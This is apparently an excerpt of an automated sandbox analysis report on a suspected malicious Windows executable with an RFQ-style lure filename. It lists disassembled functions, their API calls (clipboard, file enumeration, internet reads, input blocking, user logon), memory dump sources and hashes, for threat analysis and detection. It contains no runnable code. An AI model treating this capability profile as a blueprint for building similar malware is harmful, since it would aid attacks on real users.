                                                        • API ID: Clipboard$Close$AvailableDataFormat$GlobalLockOpen
                                                        • String ID:
                                                        • API String ID: 15083398-0
                                                        • Opcode ID: 15add7cba21d4e7b0994eb4f29ae7fc89ecef22f443925247f1b4e4ac981ab14
                                                        • Instruction ID: df02eb04a95629b292fb88db9571ebb8a4b5ed240788a0c572d8156b6d3d2bc0
                                                        • Opcode Fuzzy Hash: 15add7cba21d4e7b0994eb4f29ae7fc89ecef22f443925247f1b4e4ac981ab14
                                                        • Instruction Fuzzy Hash: 1A0128326042416BC311BBB99C8596E7B64EF4A324F04097FF984A72C1EB74A912C3A9
                                                        Function 0044F430 Relevance: 5.7, APIs: 1, Strings: 2, Instructions: 458COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: _memmove
                                                        • String ID: U$\
                                                        • API String ID: 4104443479-100911408
                                                        • Opcode ID: 8409e1e1a3b6e8568ef346b3eec2e6609d783923d36277a6c09bfee55c093031
                                                        • Instruction ID: 961864e7757f6edfa256f53df2fe8495351bb1c33360f7104140ceff5b52ad59
                                                        • Opcode Fuzzy Hash: 8409e1e1a3b6e8568ef346b3eec2e6609d783923d36277a6c09bfee55c093031
                                                        • Instruction Fuzzy Hash: 7002A070E002499FEF28CF69C4907AEBBF2AF95304F2481AED45297381D7396D4ACB55
                                                        Function 0045CAFA Relevance: 4.6, APIs: 3, Instructions: 130fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • FindFirstFileW.KERNEL32(00000000,?,?), ref: 0045CB1F
                                                        • FindNextFileW.KERNEL32(00000000,?), ref: 0045CB7C
                                                        • FindClose.KERNEL32(00000000,00000001,00000000), ref: 0045CBAB
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: Find$File$CloseFirstNext
                                                        • String ID:
                                                        • API String ID: 3541575487-0
                                                        • Opcode ID: f8ec562d354739d1813db85dcf23f13665d7d9b039f732a3c66120ad17a42715
                                                        • Instruction ID: f333144462bda28c064cc07c1e05bb1389ec512a64b809c533c1c3d7cc497df0
                                                        • Opcode Fuzzy Hash: f8ec562d354739d1813db85dcf23f13665d7d9b039f732a3c66120ad17a42715
                                                        • Instruction Fuzzy Hash: 6741DF716003019FC710EF69D881A9BB3E5FF89315F108A6EE9698B351DB75F844CB94
                                                        Function 004339B6 Relevance: 4.5, APIs: 3, Instructions: 28fileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetFileAttributesW.KERNEL32(?,00000000), ref: 004339C7
                                                        • FindFirstFileW.KERNEL32(?,?), ref: 004339D8
                                                        • FindClose.KERNEL32(00000000), ref: 004339EB
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: FileFind$AttributesCloseFirst
                                                        • String ID:
                                                        • API String ID: 48322524-0
                                                        • Opcode ID: 957631a30c41d6cd228e989780156951a90b63876f33aac8b2b1d3c9657f363e
                                                        • Instruction ID: b419dbaef297d354eb99830e4178f101d1a7f75c7260f3cbf0392e7d05c3e8e7
                                                        • Opcode Fuzzy Hash: 957631a30c41d6cd228e989780156951a90b63876f33aac8b2b1d3c9657f363e
                                                        • Instruction Fuzzy Hash: 22E092328145189B8610AA78AC0D4EE779CDF0A236F100B56FE38C21E0D7B49A9047DA
                                                        Function 004422FE Relevance: 3.1, APIs: 2, Instructions: 89networkfileCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • InternetQueryDataAvailable.WININET(?,?,00000000,00000000), ref: 0044231E
                                                        • InternetReadFile.WININET(?,00000000,?,?), ref: 00442356
                                                          • Part of subcall function 004422CB: GetLastError.KERNEL32 ref: 004422E1
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: Internet$AvailableDataErrorFileLastQueryRead
                                                        • String ID:
                                                        • API String ID: 901099227-0
                                                        • Opcode ID: b48fbef154557e42056369557a390c5e15e1cd9efc8ac9760c34eb316c367bda
                                                        • Instruction ID: 2cb050104b41b6b223ad4d4b8d529f91c68f3ac810c45c6f1fc1690b5501c343
                                                        • Opcode Fuzzy Hash: b48fbef154557e42056369557a390c5e15e1cd9efc8ac9760c34eb316c367bda
                                                        • Instruction Fuzzy Hash: B32174752002047BFB10DE26DC41FAB73A8EB54765F40C42BFE059A141D6B8E5458BA5
                                                        Function 0047EA6F Relevance: 2.0, APIs: 1, Instructions: 502COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • DefDlgProcW.USER32(?,?,?,?), ref: 0047EA9E
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: Proc
                                                        • String ID:
                                                        • API String ID: 2346855178-0
                                                        • Opcode ID: abcbf0d1afc1a497e280cfdffd4bd47b828388575322d1f456f5668f6881d692
                                                        • Instruction ID: f892bfb12232205f5f58103f0897237a3558493ed3735c4837d976d353c396a9
                                                        • Opcode Fuzzy Hash: abcbf0d1afc1a497e280cfdffd4bd47b828388575322d1f456f5668f6881d692
                                                        • Instruction Fuzzy Hash: 82B1167330C1182DF218A6AABC81EFF679CD7C5779B10863FF248C55C2D62B5821A1B9
                                                        Function 0045A370 Relevance: 1.5, APIs: 1, Instructions: 24keyboardCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • BlockInput.USER32(00000001), ref: 0045A38B
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: BlockInput
                                                        • String ID:
                                                        • API String ID: 3456056419-0
                                                        • Opcode ID: 458ede1686394d551c7eb4c8b41db034409c2976cc7efd11918dc51f9e1a79d5
                                                        • Instruction ID: ec784d9e1adcb2c5bdb0852901797f150ca91aa996cd98963819779bf85d9a24
                                                        • Opcode Fuzzy Hash: 458ede1686394d551c7eb4c8b41db034409c2976cc7efd11918dc51f9e1a79d5
                                                        • Instruction Fuzzy Hash: D8E0DF352002029FC300EF66C84495AB7E8EF94368F10883EFD45D7341EA74E80087A6
                                                        Function 00436CD7 Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • LogonUserW.ADVAPI32(?,?,?,?,00000000,?), ref: 00436CF9
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: LogonUser
                                                        • String ID:
                                                        • API String ID: 1244722697-0
                                                        • Opcode ID: 58321df28e67eb099ee318ec18723cdf01b8a378577a77c5fc1e9d8837392bcc
                                                        • Instruction ID: 7208d1371e48addad7a82bf776aec5a394cd9d1c10cc53d221989696c058f8f6
                                                        • Opcode Fuzzy Hash: 58321df28e67eb099ee318ec18723cdf01b8a378577a77c5fc1e9d8837392bcc
                                                        • Instruction Fuzzy Hash: 4DE0ECB626460EAFDB04CF68DC42EBF37ADA749710F004618BA16D7280C670E911CA74
                                                        Function 00472C3F Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • GetUserNameW.ADVAPI32(?,?), ref: 00472C51
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: NameUser
                                                        • String ID:
                                                        • API String ID: 2645101109-0
                                                        • Opcode ID: b76fc723219d1f30d7a8c85bc8b1429fb957fe091183e5ae036ed6f26941642b
                                                        • Instruction ID: cbdb53fe1e94bfc77c89611ca4b62432a5518fa0aa6a76fb1323f8d63e00c007
                                                        • Opcode Fuzzy Hash: b76fc723219d1f30d7a8c85bc8b1429fb957fe091183e5ae036ed6f26941642b
                                                        • Instruction Fuzzy Hash: C3C04CB5004008EBDB148F50D9889D93B78BB04340F108199B60E95040D7B496C9DBA5
                                                        Function 0041F250 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • SetUnhandledExceptionFilter.KERNEL32(Function_0001F20E), ref: 0041F255
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID: ExceptionFilterUnhandled
                                                        • String ID:
                                                        • API String ID: 3192549508-0
                                                        • Opcode ID: c60cc95176153529ac13be9fefe03fec559109ed9a450e1086cc56a024ff5f26
                                                        • Instruction ID: fb0c5f5a3ae0de1c345b26270a1521b23addb5e119a177cdcf8b78f668196b28
                                                        • Opcode Fuzzy Hash: c60cc95176153529ac13be9fefe03fec559109ed9a450e1086cc56a024ff5f26
                                                        • Instruction Fuzzy Hash: 8190027625150157470417705E1964925905B5960275108BA6D11C8564DAA98089A619
                                                        Function 0042200C Relevance: 1.4, Strings: 1, Instructions: 180COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: N@
                                                        • API String ID: 0-1509896676
                                                        • Opcode ID: 92e9a144b7047ce14b539b05f6d9118c1a7fbc1d7368d7adfc1bc9e5646efcc8
                                                        • Instruction ID: 433aa61276291b0397d7e0efaabfbd78b7095b9e612e68cb1662ee3b8c9c8781
                                                        • Opcode Fuzzy Hash: 92e9a144b7047ce14b539b05f6d9118c1a7fbc1d7368d7adfc1bc9e5646efcc8
                                                        • Instruction Fuzzy Hash: 48618E71A003259FCB18CF48D584AAEBBF2FF84310F5AC1AED9095B361C7B59955CB88
                                                        Function 0040FA10 Relevance: .6, Instructions: 607COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 9ccd90b163c6adb52abe1d2335d475eb1e8f24fdd15ffb4383e0e414a09222a9
                                                        • Instruction ID: 421b1f2eadcb2952f8febc08502f38db6b120a980ad90a3a21cdce547adf9c29
                                                        • Opcode Fuzzy Hash: 9ccd90b163c6adb52abe1d2335d475eb1e8f24fdd15ffb4383e0e414a09222a9
                                                        • Instruction Fuzzy Hash: 132270B7E5151A9BDB08CE95CC415D9B3A3BBC832471F9129D819E7305EE78BA078BC0
                                                        Function 004129D0 Relevance: .4, Instructions: 355COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: f02dcea883d10451d84a59732baab65edb0b568fbd8ca007beb23fa60eef1400
                                                        • Instruction ID: 2bcfc4213c201322ab01e918109ed7ba488288358e1fe6702c600853dbf8b640
                                                        • Opcode Fuzzy Hash: f02dcea883d10451d84a59732baab65edb0b568fbd8ca007beb23fa60eef1400
                                                        • Instruction Fuzzy Hash: 9CC1B473D0E6B3058B35466D45182BFFE626E91B8031FC392DDD03F399C22AADA196D4
                                                        Function 004125E8 Relevance: .3, Instructions: 349COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 0c69e47d847606dd43a020a10b245ffd8c98205713db3c8f796c6159738d0b06
                                                        • Instruction ID: 7014f9c6c4bb04029b5f83a2624c32223adacf072d8c068e18a9ecb8bc3ae66d
                                                        • Opcode Fuzzy Hash: 0c69e47d847606dd43a020a10b245ffd8c98205713db3c8f796c6159738d0b06
                                                        • Instruction Fuzzy Hash: 04C1A473D1A6B2058B36476D05182BFFE626E91B8031FC3D6CCD03F299C22AAD9596D4
                                                        Function 00412216 Relevance: .3, Instructions: 332COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1747106142.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.1747089861.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747152932.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747171920.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747188326.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747204614.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.1747240659.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_400000_RFQ - HTS45785-24-0907I000.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 21018234ac6c65dce347e9eb3c09d9e563dc327998c84d170fb29f747537f1fa
                                                        • Instruction ID: 878ae001d8650add2b069b622ec184fb54f95ec25c04ba16196e518284591b6f
                                                        • Opcode Fuzzy Hash: 21018234ac6c65dce347e9eb3c09d9e563dc327998c84d170fb29f747537f1fa
                                                        • Instruction Fuzzy Hash: FBC19473D0A6B2068B36476D05582BFFE626E91B8131FC3D2CCD03F299C22AAD9595D4
                                                        Function 004594E9 Relevance: 79.2, APIs: 41, Strings: 4, Instructions: 490filewindowcomCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • DeleteObject.GDI32(?), ref: 0045953B
                                                        • DeleteObject.GDI32(?), ref: 00459551
                                                        • DestroyWindow.USER32(?), ref: 00459563
                                                        • GetDesktopWindow.USER32 ref: 00459581
                                                        • GetWindowRect.USER32(00000000), ref: 00459588
                                                        • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 0045969E
                                                        • AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 004596AC
                                                        • CreateWindowExW.USER32(?,AutoIt v3,00000000,?,88C00000,00000002,00000007,?,?,?,00000000,00000000), ref: 004596E8
                                                        • GetClientRect.USER32(00000000,?), ref: 004596F8
                                                        • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,?,00000000,00000000,00000000), ref: 0045973B
                                                        • CreateFileW.KERNEL32(00000000,000001F4,80000000,00000000,00000000,00000003,00000000,00000000), ref: 00459760
                                                        • GetFileSize.KERNEL32(00000000,00000000), ref: 0045977B
                                                        • GlobalAlloc.KERNEL32(00000002,00000000), ref: 00459786
                                                        • GlobalLock.KERNEL32(00000000), ref: 0045978F
                                                        • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 0045979E
                                                        • GlobalUnlock.KERNEL32(00000000), ref: 004597A5
                                                        • CloseHandle.KERNEL32(00000000), ref: 004597AC
                                                        • CreateStreamOnHGlobal.OLE32(00000000,00000001,000001F4), ref: 004597B9
                                                        • OleLoadPicture.OLEAUT32(000001F4,00000000,00000000,004829F8,00000000), ref: 004597D0
                                                        • GlobalFree.KERNEL32(00000000), ref: 004597E2
                                                        • CopyImage.USER32(50000001,00000000,00000000,00000000,00002000), ref: 0045980E
                                                        • SendMessageW.USER32(00000000,00000172,00000000,50000001), ref: 00459831
                                                        • SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020), ref: 00459857
                                                        • ShowWindow.USER32(?,00000004), ref: 00459865
                                                        • CreateWindowExW.USER32(00000000,static,00000000,000001F4,50000001,0000000B,0000000B,?,?,?,00000000,00000000), ref: 004598AF
                                                        • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 004598C3
                                                        • GetStockObject.GDI32(00000011), ref: 004598CD
                                                        • SelectObject.GDI32(00000000,00000000), ref: 004598D5
                                                        • GetTextFaceW.GDI32(00000000,00000040,?), ref: 004598E5
                                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004598EE
                                                        • DeleteDC.GDI32(00000000), ref: 004598F8
                                                        • _wcslen.LIBCMT ref: 00459916
                                                        • _wcscpy.LIBCMT ref: 0045993A
                                                        • CreateFontW.GDI32(?,00000000,00000000,00000000,00000190,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 004599DB
                                                        • SendMessageW.USER32(00000000,00000030,00000000,00000001), ref: 004599EF
                                                        • GetDC.USER32(00000000), ref: 004599FC
                                                        • SelectObject.GDI32(00000000,?), ref: 00459A0C
                                                        • SelectObject.GDI32(00000000,00000007), ref: 00459A37
                                                        • ReleaseDC.USER32(00000000,00000000), ref: 00459A42
                                                        • MoveWindow.USER32(00000000,0000000B,?,?,00000190,00000001), ref: 00459A5F
                                                        • ShowWindow.USER32(?,00000004,?,00000000,00000000,00000000,00000190,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 00459A6D
                                                        Strings
                                                        Memory Dump Source
